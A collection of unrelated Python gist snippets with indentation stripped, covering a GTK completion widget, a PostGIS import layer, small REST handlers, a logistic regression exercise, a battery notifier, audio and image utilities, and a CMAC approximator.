current_text = "%s %s" % (current_text, model[iter][0])
# set back the whole text
self.set_text(current_text)
# move the cursor at the end
self.set_position(-1)
# stop the event propagation
return True
if __name__ == "main": # register the class as a Gtk widget gobject.type_register(EntryMultiCompletion)
win = gtk.Window()
win.connect("delete-event", gtk.main_quit)
entrycompl = EntryMultiCompletion()
liststore = gtk.ListStore(gobject.TYPE_STRING)
entrycompl.completion.set_model(liststore)
entrycompl.completion.set_text_column(0)
for word in ['abc', 'def', 'ghi', 'jkl', 'mno',
'pqr', 'stu', 'vwx', 'yz']:
liststore.append([word])
win.add(entrycompl)
win.show_all()
gtk.main()
```
#### File: hard-gists/1650418/snippet.py
```python
import time
import psycopg2
import psycopg2.extensions
import logging
log = logging.getLogger(__name__)
from imposm.mapping import UnionView, GeneralizedTable, Mapping
class PostGISDB(object):
def __init__(self, db_conf):
self.db_conf = db_conf
self.srid = int(db_conf['proj'].split(':')[1])
self._insert_stmts = {}
self._connection = None
self._cur = None
@property
def table_prefix(self):
return self.db_conf.prefix.rstrip('_') + '_'
def to_tablename(self, name):
return self.table_prefix + name.lower()
@property
def connection(self):
if not self._connection:
kw = {}
if self.db_conf.port:
kw['port'] = int(self.db_conf.port)
self._connection = psycopg2.connect(
database=self.db_conf.db,
host=self.db_conf.host,
user=self.db_conf.user,
password=self.db_conf.password,
sslmode=self.db_conf.get('sslmode', 'allow'),
**kw
)
self._connection.set_isolation_level(
psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED)
return self._connection
def commit(self):
self.connection.commit()
@property
def cur(self):
if self._cur is None:
self._cur = self.connection.cursor()
return self._cur
def insert(self, mapping, insert_data, tries=0):
insert_stmt = self.insert_stmt(mapping)
try:
if tries:
self.reconnect()
self.cur.executemany(insert_stmt, insert_data)
except psycopg2.OperationalError, ex:
if tries >= 8:
log.warn('%s, giving up', ex)
raise
seconds = 2 ** (tries + 1)
log.warn('%s, retry in %d', ex, seconds)
time.sleep(seconds)
self.insert(mapping, insert_data, tries=tries + 1)
except psycopg2.Error, ex:
self.connection.rollback()
for data in insert_data:
try:
self.cur.execute(insert_stmt, data)
except psycopg2.Error, ex:
log.warn('error while importing "%r": %s', data, ex)
self.connection.rollback()
else:
self.connection.commit()
self.connection.commit()
def geom_wrapper(self, geom):
return psycopg2.Binary(geom.wkb)
def reconnect(self):
if self._connection:
try:
self._connection.close()
except psycopg2.InterfaceError:
pass
self._connection = None
self._cur = None
def insert_stmt(self, mapping):
if mapping.name not in self._insert_stmts:
self._insert_stmts[mapping.name] = self._insert_stmt(mapping)
return self._insert_stmts[mapping.name]
def _insert_stmt(self, mapping):
extra_arg_names = extra_args = ''
if mapping.fields:
extra_arg_names = [n for n, t in mapping.fields]
extra_args = ', %s' * len(extra_arg_names)
extra_arg_names = ', ' + ', '.join('"' + name + '"' for name in extra_arg_names)
return """INSERT INTO "%(tablename)s"
(osm_id, type, geometry %(extra_arg_names)s)
VALUES (%%s, %%s, ST_Transform(ST_GeomFromWKB(%%s, 4326), %(srid)s)
%(extra_args)s)
""".strip() % dict(tablename=self.table_prefix + mapping.name, srid=self.srid,
extra_arg_names=extra_arg_names, extra_args=extra_args)
def create_tables(self, mappings):
for mapping in mappings:
self.create_table(mapping)
def create_table(self, mapping):
tablename = self.table_prefix + mapping.name
cur = self.connection.cursor()
cur.execute('SAVEPOINT pre_drop_tables')
try:
cur.execute('DROP TABLE "' + tablename + '" CASCADE')
except psycopg2.ProgrammingError:
cur.execute('ROLLBACK TO SAVEPOINT pre_drop_tables')
extra_fields = ''
for n, t in mapping.fields:
extra_fields += ', "%s" %s ' % (n, t.column_type)
cur.execute("""
CREATE TABLE "%s" (
osm_id INT4 PRIMARY KEY,
type VARCHAR(255)
%s
);
""" % (tablename, extra_fields))
cur.execute("""
SELECT AddGeometryColumn ('', '%(tablename)s', 'geometry',
%(srid)s, '%(pg_geometry_type)s', 2)
""" % dict(tablename=tablename, srid=self.srid,
pg_geometry_type=mapping.geom_type))
cur.execute("""
CREATE INDEX "%(tablename)s_geom" ON "%(tablename)s" USING GIST (geometry)
""" % dict(tablename=tablename))
def swap_tables(self, new_prefix, existing_prefix, backup_prefix):
cur = self.connection.cursor()
self.remove_tables(backup_prefix)
cur.execute('SELECT tablename FROM pg_tables WHERE tablename like %s', (existing_prefix + '%', ))
existing_tables = []
for row in cur:
table_name = row[0]
if table_name.startswith(existing_prefix) and not table_name.startswith((new_prefix, backup_prefix)):
existing_tables.append(table_name)
cur.execute('SELECT indexname FROM pg_indexes WHERE indexname like %s', (existing_prefix + '%', ))
existing_indexes = set()
for row in cur:
index_name = row[0]
if table_name.startswith(existing_prefix) and not index_name.startswith((new_prefix, backup_prefix)):
existing_indexes.add(index_name)
cur.execute('SELECT tablename FROM pg_tables WHERE tablename like %s', (new_prefix + '%', ))
new_tables = []
for row in cur:
table_name = row[0]
new_tables.append(table_name)
cur.execute('SELECT indexname FROM pg_indexes WHERE indexname like %s', (new_prefix + '%', ))
new_indexes = set()
for row in cur:
index_name = row[0]
new_indexes.add(index_name)
if not new_tables:
raise RuntimeError('did not find tables to swap')
for table_name in existing_tables:
rename_to = table_name.replace(existing_prefix, backup_prefix)
cur.execute('ALTER TABLE "%s" RENAME TO "%s"' % (table_name, rename_to))
if table_name + '_geom' in existing_indexes:
cur.execute('ALTER INDEX "%s" RENAME TO "%s"' % (table_name + '_geom', rename_to + '_geom'))
if table_name + '_pkey' in existing_indexes:
cur.execute('ALTER INDEX "%s" RENAME TO "%s"' % (table_name + '_pkey', rename_to + '_pkey'))
#cur.execute('UPDATE geometry_columns SET f_table_name = %s WHERE f_table_name = %s', (rename_to, table_name))
for table_name in new_tables:
rename_to = table_name.replace(new_prefix, existing_prefix)
cur.execute('ALTER TABLE "%s" RENAME TO "%s"' % (table_name, rename_to))
if table_name + '_geom' in new_indexes:
cur.execute('ALTER INDEX "%s" RENAME TO "%s"' % (table_name + '_geom', rename_to + '_geom'))
if table_name + '_pkey' in new_indexes:
cur.execute('ALTER INDEX "%s" RENAME TO "%s"' % (table_name + '_pkey', rename_to + '_pkey'))
#cur.execute('UPDATE geometry_columns SET f_table_name = %s WHERE f_table_name = %s', (rename_to, table_name))
def remove_tables(self, prefix):
cur = self.connection.cursor()
cur.execute('SELECT tablename FROM pg_tables WHERE tablename like %s', (prefix + '%', ))
remove_tables = [row[0] for row in cur]
for table_name in remove_tables:
cur.execute("DROP TABLE %s CASCADE" % (table_name, ))
#cur.execute("DELETE FROM geometry_columns WHERE f_table_name = %s", (table_name, ))
def remove_views(self, prefix):
cur = self.connection.cursor()
cur.execute('SELECT viewname FROM pg_views WHERE viewname like %s', (prefix + '%', ))
remove_views = [row[0] for row in cur]
for view_name in remove_views:
cur.execute('DROP VIEW "%s" CASCADE' % (view_name, ))
#cur.execute("DELETE FROM geometry_columns WHERE f_table_name = %s", (view_name, ))
def create_views(self, mappings, ignore_errors=False):
for mapping in mappings.values():
if isinstance(mapping, UnionView):
PostGISUnionView(self, mapping).create(ignore_errors=ignore_errors)
def create_generalized_tables(self, mappings):
mappings = [m for m in mappings.values() if isinstance(m, GeneralizedTable)]
for mapping in sorted(mappings, key=lambda x: x.name, reverse=True):
PostGISGeneralizedTable(self, mapping).create()
def optimize(self, mappings):
mappings = [m for m in mappings.values() if isinstance(m, (GeneralizedTable, Mapping))]
for mapping in mappings:
table_name = self.to_tablename(mapping.name)
self.optimize_table(table_name, '%s_geom' % table_name)
self.vacuum()
def optimize_table(self, table_name, idx_name):
cur = self.connection.cursor()
print 'Clustering table %s' % table_name
cur.execute('CLUSTER "%s" ON "%s"' % (idx_name, table_name))
self.connection.commit()
def vacuum(self):
old_isolation_level = self.connection.isolation_level
self.reconnect()
self.connection.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
cur = self.connection.cursor()
print 'Vacuum analyze'
cur.execute("VACUUM ANALYZE")
self.connection.set_isolation_level(old_isolation_level)
class PostGISUnionView(object):
def __init__(self, db, mapping):
self.mapping = mapping
self.db = db
self.view_name = db.to_tablename(mapping.name)
def _view_stmt(self):
selects = []
for mapping in self.mapping.mappings:
field_str = ', '.join(self._mapping_fields(mapping))
selects.append("""SELECT osm_id, type, geometry, %s,
'%s' as class from "%s" """ % (
field_str, mapping.classname or mapping.name, self.db.to_tablename(mapping.name)))
selects = '\nUNION ALL\n'.join(selects)
stmt = 'CREATE VIEW "%s" as (\n%s\n)' % (self.view_name, selects)
return stmt
def _geom_table_stmt(self):
stmt = "insert into geometry_columns values ('', 'public', '%s', 'geometry', 2, %d, 'GEOMETRY')" % (
self.view_name, self.db.srid)
return stmt
def _mapping_fields(self, mapping):
mapping_fields = set([n for n, t in mapping.fields])
fields = []
for name, default in self.mapping.fields:
if name in mapping_fields:
fields.append('"' + name + '"')
else:
if default is None:
default = 'null'
elif isinstance(default, basestring):
default = "'%s'" % default
else:
default = str(default)
fields.append(default + ' as "' + name + '"')
return fields
def create(self, ignore_errors):
cur = self.db.connection.cursor()
cur.execute('BEGIN')
try:
cur.execute('SAVEPOINT pre_create_view')
cur.execute('SELECT * FROM pg_views WHERE viewname = %s', (self.view_name, ))
if cur.fetchall():
cur.execute('DROP VIEW %s' % (self.view_name, ))
cur.execute(self._view_stmt())
except psycopg2.ProgrammingError:
cur.execute('ROLLBACK TO SAVEPOINT pre_create_view')
if not ignore_errors:
raise
#cur.execute('SELECT * FROM geometry_columns WHERE f_table_name = %s', (self.view_name, ))
#if cur.fetchall():
# drop old entry to handle changes of SRID
#cur.execute('DELETE FROM geometry_columns WHERE f_table_name = %s', (self.view_name, ))
#cur.execute(self._geom_table_stmt())
class PostGISGeneralizedTable(object):
def __init__(self, db, mapping):
self.db = db
self.mapping = mapping
self.table_name = db.to_tablename(mapping.name)
def _idx_stmt(self):
return 'CREATE INDEX "%s_geom" ON "%s" USING GIST (geometry)' % (
self.table_name, self.table_name)
def _geom_table_stmt(self):
stmt = "insert into geometry_columns values ('', 'public', '%s', 'geometry', 2, %d, 'GEOMETRY')" % (
self.table_name, self.db.srid)
return stmt
def _stmt(self):
fields = ', '.join([n for n, t in self.mapping.fields])
if fields:
fields += ','
if self.mapping.where:
where = ' WHERE ' + self.mapping.where
else:
where = ''
return """CREATE TABLE "%s" AS (SELECT osm_id, type, %s
ST_Simplify(geometry, %f) as geometry from "%s"%s)""" % (
self.table_name, fields, self.mapping.tolerance, self.db.to_tablename(self.mapping.origin.name),
where)
def create(self):
cur = self.db.connection.cursor()
cur.execute('BEGIN')
try:
cur.execute('SAVEPOINT pre_drop_table')
cur.execute('DROP TABLE "%s" CASCADE' % (self.table_name, ))
except psycopg2.ProgrammingError:
cur.execute('ROLLBACK TO SAVEPOINT pre_drop_table')
cur.execute(self._stmt())
cur.execute(self._idx_stmt())
#cur.execute('SELECT * FROM geometry_columns WHERE f_table_name = %s', (self.table_name, ))
#if cur.fetchall():
# drop old entry to handle changes of SRID
#cur.execute('DELETE FROM geometry_columns WHERE f_table_name = %s', (self.table_name, ))
#cur.execute(self._geom_table_stmt())
```
#### File: hard-gists/1653394/snippet.py
```python
from pyramid.config import Configurator
from pyramid.view import view_config
import json
import logging
import datetime
log = logging.getLogger(__name__)
from webservice.model import Session, Machine, LogFile, LogMessage
session = Session.connect('test')
datetime_types = (datetime.time, datetime.date, datetime.datetime)
class JSONEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime_types):
obj = str(obj)
return obj
class BaseRestHandler(object):
MODEL = None
limit = 25
order = None
direction = None
def __init__(self, request):
self.request = request
if not self.order:
self.order = self.MODEL.created_at
self.direction = 'descending'
def __call__(self, *args, **kwargs):
rv = getattr(self, self.request.method)(*args, **kwargs)
return json.dumps(rv, cls=JSONEncoder)
def filter(self):
return ()
def GET(self):
query = session.query(self.MODEL) \
.filter(*self.filter()) \
.limit(self.limit)
query = getattr(query, self.direction)(self.order)
return [i.to_dict(exclude=['mongo_id']) for i in query.all()]
def POST(self):
raise HTTPNotImplemented()
def PUT(self):
raise HTTPNotImplemented()
def DELETE(self):
raise HTTPNotImplemented()
def __fetch_from__(self, src, model, match_key, model_attr):
val = src.get(match_key)
if not val:
raise NotFound('%s not found' % model.__name__)
try:
obj = session.query(model).filter(model_attr == val).one()
except NoResultFound:
raise NotFound('%s %s not found' % (model.__name__, str(val)))
return obj
def __fetch__(self, model, match_key, model_attr):
return self.__fetch_from__(self.request.matchdict,
model,
match_key,
model_attr)
def __post__(self, model, match_key, model_attr):
return self.__fetch_from__(self.request.POST,
model,
match_key,
model_attr)
@view_config(route_name='machines', renderer='string')
class MachinesHandler(BaseRestHandler):
MODEL = Machine
@view_config(route_name='log-files', renderer='string')
class LogFilesHandler(BaseRestHandler):
MODEL = LogMessage
@view_config(route_name='log-messages', renderer='string')
class LogsHandler(BaseRestHandler):
MODEL = LogMessage
def main(global_config, **settings):
config = Configurator(settings=settings)
config.include('pyramid_handlers')
config.add_static_view('static', 'ui:static')
config.add_route('machines', '/machines')
config.add_route('log-files', '/log-files')
config.add_route('log-messages', '/log-messages')
config.scan()
return config.make_wsgi_app()
```
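The `filter()` hook and `__fetch__` helper go unused in the three handlers above; a heavily hedged sketch of what a filtering handler could look like, where the route, the field names and the `machine_id` attribute are all invented:
```python
# Hypothetical handler restricting log messages to a single machine.
# Machine.name and LogMessage.machine_id are assumed field names.
@view_config(route_name='machine-log-messages', renderer='string')
class MachineLogsHandler(BaseRestHandler):
    MODEL = LogMessage
    limit = 50

    def filter(self):
        # /machines/{name}/log-messages -> resolve the machine, then filter on it.
        machine = self.__fetch__(Machine, 'name', Machine.name)
        return (LogMessage.machine_id == machine.mongo_id,)

# and in main(): config.add_route('machine-log-messages',
#                                 '/machines/{name}/log-messages')
```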
#### File: hard-gists/1688557/snippet.py
```python
from django.shortcuts import render
class RestfulView(object):
allowed_methods = ["GET", "POST"]
def __call__(self, request, *args, **kwargs):
if request.method not in self.allowed_methods or not hasattr(self, request.method):
return self.method_not_allowed(request)
return getattr(self, request.method)(request, *args, **kwargs)
def method_not_allowed(self, request):
return render(request, "405.html", status=405)
```
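A hypothetical subclass showing the dispatch pattern in use; the view and URL are invented:
```python
# Hypothetical usage of RestfulView: one callable instance serves GET and POST.
from django.http import HttpResponse


class PingView(RestfulView):
    allowed_methods = ["GET", "POST"]

    def GET(self, request):
        return HttpResponse("pong")

    def POST(self, request):
        return HttpResponse("created", status=201)

# urls.py (assumed): url(r'^ping/$', PingView()),
```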
#### File: hard-gists/1693769/snippet.py
```python
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from scipy import optimize
from numpy import newaxis, r_, c_, mat, e
from numpy.linalg import *
def plotData(X, y):
#pos = (y.ravel() == 1).nonzero()
#neg = (y.ravel() == 0).nonzero()
pos = (y == 1).nonzero()[:1]
neg = (y == 0).nonzero()[:1]
plt.plot(X[pos, 0].T, X[pos, 1].T, 'k+', markeredgewidth=2, markersize=7)
plt.plot(X[neg, 0].T, X[neg, 1].T, 'ko', markerfacecolor='r', markersize=7)
def sigmoid(z):
g = 1. / (1 + e**(-z.A))
return g
def costFunction(theta, X, y):
m = X.shape[0]
predictions = sigmoid(X * c_[theta])
J = 1./m * (-y.T.dot(np.log(predictions)) - (1-y).T.dot(np.log(1 - predictions)))
#grad = 1./m * X.T * (predictions - y)
return J[0][0]##, grad.A
def predict(theta, X):
p = sigmoid(X * c_[theta]) >= 0.5
return p
def plotDecisionBoundary(theta, X, y):
plotData(X[:, 1:3], y)
if X.shape[1] <= 3:
plot_x = r_[X[:,2].min()-2, X[:,2].max()+2]
plot_y = (-1./theta[2]) * (theta[1]*plot_x + theta[0])
plt.plot(plot_x, plot_y)
plt.legend(['Admitted', 'Not admitted', 'Decision Boundary'])
plt.axis([30, 100, 30, 100])
else:
pass
if __name__ == '__main__':
data = np.loadtxt('ex2data1.txt', delimiter=',')
X = mat(c_[data[:, :2]])
y = c_[data[:, 2]]
# ============= Part 1: Plotting
print 'Plotting data with + indicating (y = 1) examples and o ' \
'indicating (y = 0) examples.'
plotData(X, y)
plt.ylabel('Exam 1 score')
plt.xlabel('Exam 2 score')
plt.legend(['Admitted', 'Not admitted'])
plt.show()
raw_input('Press any key to continue\n')
# ============= Part 2: Compute cost and gradient
m, n = X.shape
X = c_[np.ones(m), X]
initial_theta = np.zeros(n+1)
cost, grad = costFunction(initial_theta, X, y), None
print 'Cost at initial theta (zeros): %f' % cost
print 'Gradient at initial theta (zeros):\n%s' % grad
raw_input('Press any key to continue\n')
# ============= Part 3: Optimizing using fminunc
options = {'full_output': True, 'maxiter': 400}
theta, cost, _, _, _ = \
optimize.fmin(lambda t: costFunction(t, X, y), initial_theta, **options)
print 'Cost at theta found by fminunc: %f' % cost
print 'theta: %s' % theta
plotDecisionBoundary(theta, X, y)
plt.show()
raw_input('Press any key to continue\n')
# ============== Part 4: Predict and Accuracies
prob = sigmoid(mat('1 45 85') * c_[theta])
print 'For a student with scores 45 and 85, we predict an admission ' \
'probability of %f' % prob
p = predict(theta, X)
print 'Train Accuracy:', (p == y).mean() * 100
raw_input('Press any key to continue\n')
```
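For reference, `costFunction` above implements the standard unregularized logistic regression cost, and the commented-out `grad` line is its gradient; with h_theta(x) = sigmoid(theta^T x) they read:
```latex
J(\theta) = -\frac{1}{m} \sum_{i=1}^{m}
    \Bigl[ y^{(i)} \log h_\theta(x^{(i)})
         + \bigl(1 - y^{(i)}\bigr) \log\bigl(1 - h_\theta(x^{(i)})\bigr) \Bigr]
\qquad
\frac{\partial J}{\partial \theta_j}
    = \frac{1}{m} \sum_{i=1}^{m} \bigl(h_\theta(x^{(i)}) - y^{(i)}\bigr)\, x_j^{(i)}
```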
#### File: hard-gists/16c0eb09d232461a773c22803a3df35e/snippet.py
```python
from gi.repository import Notify
import subprocess
from time import sleep, time
from sys import argv
import dbus
def send_notification(title, text):
try:
if Notify.init(argv[0]):
n = Notify.Notification.new("Notify")
n.update(title, text)
n.set_urgency(2)
if not n.show():
raise SyntaxError("sending notification failed!")
else:
raise SyntaxError("can't initialize notification!")
except SyntaxError as error:
print(error)
if error == "sending notification failed!":
Notify.uninit()
else:
Notify.uninit()
def run_cmd(cmdlist):
try:
stdout = subprocess.check_output(cmdlist)
except subprocess.CalledProcessError:
pass
else:
if stdout:
return stdout
def run_dbus_method(bus_type, obj, path, interface, method, arg):
if bus_type == "session":
bus = dbus.SessionBus()
if bus_type == "system":
bus = dbus.SystemBus()
proxy = bus.get_object(obj, path)
method = proxy.get_dbus_method(method, interface)
if arg:
return method(arg)
else:
return method()
def suspend_system():
run_dbus_method('session',
'com.canonical.Unity',
'/com/canonical/Unity/Session',
'com.canonical.Unity.Session',
'Suspend', 'None')
def get_battery_percentage():
output = run_cmd(['upower', '--dump']).decode().split('\n')
found_battery = False
for line in output:
if 'BAT' in line:
found_battery = True
if found_battery and 'percentage' in line:
return line.split()[1].split('%')[0]
def main():
end = time()
battery_path = ""
for line in run_cmd(['upower', '-e']).decode().split('\n'):
if 'battery_BAT' in line:
battery_path = line
break
while True:
notified = False
while subprocess.call(['on_ac_power']) == 0:
sleep(0.25)
run_dbus_method('system', 'org.freedesktop.UPower',
battery_path, 'org.freedesktop.UPower.Device',
'Refresh', 'None')
battery_percentage = int(get_battery_percentage())
if battery_percentage == int(argv[2]) and not notified:
subprocess.call( ['zenity', '--info','--text', 'Battery reached ' + argv[2] + '%' ] )
notified = True
while subprocess.call(['on_ac_power']) == 1:
sleep(0.25)
run_dbus_method('system', 'org.freedesktop.UPower',
battery_path, 'org.freedesktop.UPower.Device',
'Refresh', 'None')
battery_percentage = int(get_battery_percentage())
if battery_percentage <= int(argv[1]):
if battery_percentage <= 10:
send_notification('Low Battery',
'Will suspend in 60 seconds')
sleep(60)
suspend_system()
continue
if end < time():
end = time() + 600
send_notification('Low Battery', 'Plug in your charger')
if __name__ == '__main__':
main()
```
#### File: hard-gists/1773870/snippet.py
```python
import wave
import numpy
import struct
import sys
import csv
from scikits.samplerate import resample
def write_wav(data, filename, framerate, amplitude):
wavfile = wave.open(filename, "w")
nchannels = 1
sampwidth = 2
framerate = framerate
nframes = len(data)
comptype = "NONE"
compname = "not compressed"
wavfile.setparams((nchannels,
sampwidth,
framerate,
nframes,
comptype,
compname))
print("Please be patient whilst the file is written")
frames = []
for s in data:
mul = int(s * amplitude)
# print "s: %f mul: %d" % (s, mul)
frames.append(struct.pack('h', mul))
# frames = (struct.pack('h', int(s*self.amp)) for s in sine_list)
frames = ''.join(frames)
for x in xrange(0, 7200):
wavfile.writeframes(frames)
wavfile.close()
print("%s written" %(filename))
if __name__ == "__main__":
if len(sys.argv) <= 1:
print "You must supply a filename to generate"
exit(-1)
for fname in sys.argv[1:]:
data = []
for time, value in csv.reader(open(fname, 'U'), delimiter=','):
try:
data.append(float(value))
except ValueError:
pass # Just skip it
print "Generating wave file from %d samples" % (len(data),)
arr = numpy.array(data)
# Normalize data
arr /= numpy.max(numpy.abs(data))
filename_head, extension = fname.rsplit(".", 1)
# Resample normalized data to 44.1 kHz
target_samplerate = 44100
sampled = resample(arr, target_samplerate/100000.0, 'sinc_best')
write_wav(sampled, filename_head + ".wav", 100000, 32700)
```
#### File: hard-gists/1788517/snippet.py
```python
from PIL import Image, ImageChops, ImageStat
from argparse import ArgumentParser
import sys, heapq
MAGIC_THRESHOLD = 11 # carefully handpicked to work with your reference input
# calculate per-channel image difference and binarize the result, returns image
def image_diff(edge1, edge2):
diff = ImageChops.difference(edge1, edge2) # abs(edge1-edge2)
return Image.eval(diff, lambda i: i>MAGIC_THRESHOLD and 1) # binarize
# heuristics based on aggregate per-pixel difference; returns score (larger score = more differences)
def edge_score(edge1, edge2):
edge_sum_rgb = ImageStat.Stat(image_diff(edge1, edge2)).sum
return sum(edge_sum_rgb) # R+G+B
# vertical blur (5px mean, used for filtering out high frequencies)
def vblur(image):
const_ = Image.new(image.mode, image.size)
o = (ImageChops.add(ImageChops.offset(image, 0, d), const_, scale=5) for d in range(-2, 3))
return reduce(ImageChops.add, o)
# unshred an image given known column width; returns iterable of column indices
def find_sequence(image, col_width):
width, height = image.size;
cols = width / col_width
# extract edges (1px strip from left & right side of each column)
left_edges = []
right_edges = []
for i in range(cols):
left_edges+=vblur(image.crop((i*col_width, 0, i*col_width+1, height))),
right_edges+=vblur(image.crop(((i+1)*col_width-1, 0, (i+1)*col_width, height))),
# precalc fitness scores for each column pair
scores = []
for i in range(cols):
row = []
for j in range(cols):
if i == j:
row += sys.maxint, # forget about i==j cases
continue
row += edge_score(left_edges[i], right_edges[j]),
scores += row,
# find the best column to start reconstruction from
best_starter = -1
bst_left_score = bst_right_score = sys.maxint
for i in range(cols):
loc_best_l = min(scores[i])
loc_best_r = min(scores[j][i] for j in range(cols))
if loc_best_l < bst_left_score and loc_best_r < bst_right_score:
bst_left_score = loc_best_l
bst_right_score = loc_best_r
best_starter = i
remain = range(cols)
remain.remove(best_starter)
result = [best_starter,]
# rebuild the rest of the f-ng owl
while remain:
#uncomment to dump step by step vis to files:
#reorder_shreds(image, result, col_width).save('%d.jpg'%len(result))
left = result[0]
right = result[-1]
left_score, left_idx = min((scores[left][rem_i], rem_i) for rem_i in remain)
right_score, right_idx = min((scores[rem_i][right], rem_i) for rem_i in remain)
if left_score < right_score:
# put left
remain.remove(left_idx)
result.insert(0, left_idx)
else:
# put right
remain.remove(right_idx)
result.append(right_idx)
return result
# reorder columns /given sequence; returns new image
def reorder_shreds(image, new_order, col_width = None):
result = Image.new(image.mode, image.size)
width,height = image.size
if not col_width: col_width = width/len(new_order)
for i,j in enumerate(new_order):
col = image.crop((j*col_width, 0, (j+1)*col_width, height))
result.paste(col, (i*col_width, 0))
return result
MAGIC_LINES_TO_CONSIDER = 5
# heuristics based on longest continuous diff (similar to edge_score, but used for autodetection)
def edge_line_score(l1, l2):
e = image_diff(l1, l2)
w,h = e.size
d = e.getdata()
counter = 0
lines = []
for v in d:
if sum(v) == 0:
if counter != 0:
heapq.heappush(lines, counter)
counter = 0
continue
counter+=1
return sum(heapq.nlargest(MAGIC_LINES_TO_CONSIDER, lines))
# autodetects column width, returns positive integer (pixels) or 0 if failed
def detect_shred_width(image):
width,height = image.size
possible_col_no = filter(lambda x: 0==width%x, range(4, width/4+1))
# estimates score for col. number hypothesis, higher score = more likely
def calc_score(cols):
col_width = width/cols
def line_score(x):
l1 = image.crop((x, 0, x+1, height))
l2 = image.crop((x-1, 0, x, height))
return edge_line_score(l1, l2)
l_scores = []
for i in range(1, cols):
pre_l, l, post_l = (line_score(col_width*i+d) for d in range(-1, 2))
l_scores += l-(pre_l+post_l),
return float(sum(l_scores)) / (cols-1)
# estimate score for all legit col numbers
scores = map(calc_score, possible_col_no)
# if the actual strip width is 32px, then 64, 128 and 256 will most probably
# get good score as well (same for 5, 10, 20, 40, etc)
# the following section tries to solve this by looking for the biggest
# column number with a (relatively) good score
best_guess = 1
best_score = 0
for score, guess in sorted(zip(scores, possible_col_no), reverse=True):
if score <= 0: continue
if guess > best_guess:
times = guess/best_guess
if score * times > best_score:
best_guess = guess
best_score = score
if best_score == 0:
return 0
return width/best_guess
# read file, autodetect width if needed, unshred, save
def unshred(in_filename, out_filename, shred_width = None):
image = Image.open(in_filename)
if not shred_width:
shred_width = detect_shred_width(image)
if not shred_width:
print "Autodetection failed, try -w flag"
return
print "Autodetected strip width %dpx" % shred_width
print "Unshredding..."
sequence = find_sequence(image, shred_width)
reorder_shreds(image, sequence).save(out_filename)
print "Done => %s" % out_filename
# parse command line args
def main():
parser = ArgumentParser(description="Unshred a shredded image")
parser.add_argument('input_image')
parser.add_argument('output_image')
parser.add_argument('--strip_width', '-w', help="force strip width W px. (disables autodetect)", type=int, default=0)
args = parser.parse_args()
unshred(args.input_image, args.output_image, args.strip_width)
if __name__ == "__main__":
main()
```
#### File: hard-gists/1792732/snippet.py
```python
import os, sys, getopt, pdb
from numpy import *
from numpy.random import *
import pylab
from mpl_toolkits.mplot3d import Axes3D
import pickle
pylab.ioff()
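# CMAC (Cerebellar Model Articulation Controller): a tile-coding function approximator with hashed receptive fields.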
class CMAC(object):
def __init__(self, nlevels, quantization, beta):
self.nlevels = nlevels
self.quantization = quantization
self.weights = {}
self.beta = beta
def save(self,filename):
pickle.dump(self, open(filename, 'wb'), pickle.HIGHEST_PROTOCOL)
def quantize(self, vector):
"""
Generate receptive field coordinates for each level of the CMAC.
"""
quantized = (vector / self.quantization).astype(int)
coords = []
for i in range(self.nlevels):
# Note that the tile size is nlevels * quantization!
# Coordinates for this tile.
point = list(quantized - (quantized - i) % self.nlevels)
# Label the ith tile so that it gets hashed uniquely.
point.append(i)
coords.append(tuple(point))
return coords
def difference(self, vector, delta, quantized = False):
"""
Train the CMAC using the difference instead of the response.
"""
# Coordinates for each level tiling.
coords = None
if quantized == False:
coords = self.quantize(vector)
else:
coords = vector
error = self.beta * delta # delta = response - prediction
for pt in coords:
self.weights[pt] += error
return delta
def response(self, vector, response, quantized = False):
"""
Train the CMAC.
"""
# Coordinates for each level tiling.
coords = None
if quantized == False:
coords = self.quantize(vector)
else:
coords = vector
# Use Python's own hashing for storing feature weights. If you
# roll your own you'll have to learn about Universal Hashing.
prediction = sum([self.weights.setdefault(pt, 0.0) for pt in coords]) / len(coords)
error = self.beta * (response - prediction)
for pt in coords:
self.weights[pt] += error
return prediction
def __len__(self):
return len(self.weights)
def eval(self, vector, quantized = False):
"""
Eval the CMAC.
"""
# Coordinates for each level tiling.
coords = None
if quantized == False:
coords = self.quantize(vector)
else:
coords = vector
return sum([self.weights.setdefault(pt, 0.0) for pt in coords]) / len(coords)
def test(name):
if name == 'sin':
cmac = CMAC(32, .01, 0.1)
points = uniform(low=0,high=2*pi,size=1000)
responses = sin(points)
errors = []
for (point, response) in zip(points, responses):
predicted = cmac.response(array([point]),response)
errors.append(abs(response - predicted))
#print point, response, predicted
points = uniform(low=0, high=2*pi, size=100)
actual = []
for point in points:
actual.append(cmac.eval(array([point])))
pylab.figure(1)
pylab.plot(points,actual, '.')
pylab.figure(2)
pylab.plot(errors)
pylab.show()
elif name == 'wave':
cmac = CMAC(32, .1, 0.01)
points = uniform(low=0,high=2*pi,size=(10000,2))
responses = sin(points[:,0]) + cos(points[:,1])
errors = []
for (point,response) in zip(points,responses):
predicted = cmac.response(point,response)
errors.append(abs(response - predicted))
#print point, response, predicted
fig1 = pylab.figure(1)
#ax1 = fig1.add_subplot(111,projection='3d')
ax1 = Axes3D(fig1)
ax1.scatter(points[:,0], points[:,1], responses)
points = uniform(low=0,high=2*pi,size=(10000,2))
predictions = []
for point in points:
predictions.append(cmac.eval(point))
fig2 = pylab.figure(2)
#ax2 = fig2.add_subplot(111,projection='3d')
ax2 = Axes3D(fig2)
ax2.scatter(points[:,0], points[:,1], predictions)
# print len(cmac)
# pylab.plot(errors)
pylab.show()
def main():
def usage():
print sys.argv[0] + " [-h] [-d]"
try:
(options, args) = getopt.getopt(sys.argv[1:], 'dh', ['help','debug'])
except getopt.GetoptError:
# print help information and exit:
usage()
sys.exit(2)
for o, a in options:
if o in ('-h', '--help'):
usage()
sys.exit()
elif o in ('-d', '--debug'):
pdb.set_trace()
test('wave')
if __name__ == "__main__":
main()
```
#### File: hard-gists/1820829/snippet.py
```python
import os
import web
from jinja2 import Environment,FileSystemLoader
# Router
urls = (
"/.*", "hello",
'/contact', 'rsvp'
)
app = web.application(urls, globals())
# Define template rendering with jinja2 without overriding native render
def render_template(template_name, **context):
extensions = context.pop('extensions', [])
globals = context.pop('globals', {})
jinja_env = Environment(
loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')),
extensions=extensions,
)
jinja_env.globals.update(globals)
return jinja_env.get_template(template_name).render(context)
# Controller
class hello:
def GET(self):
return render_template('index.html')
class rsvp:
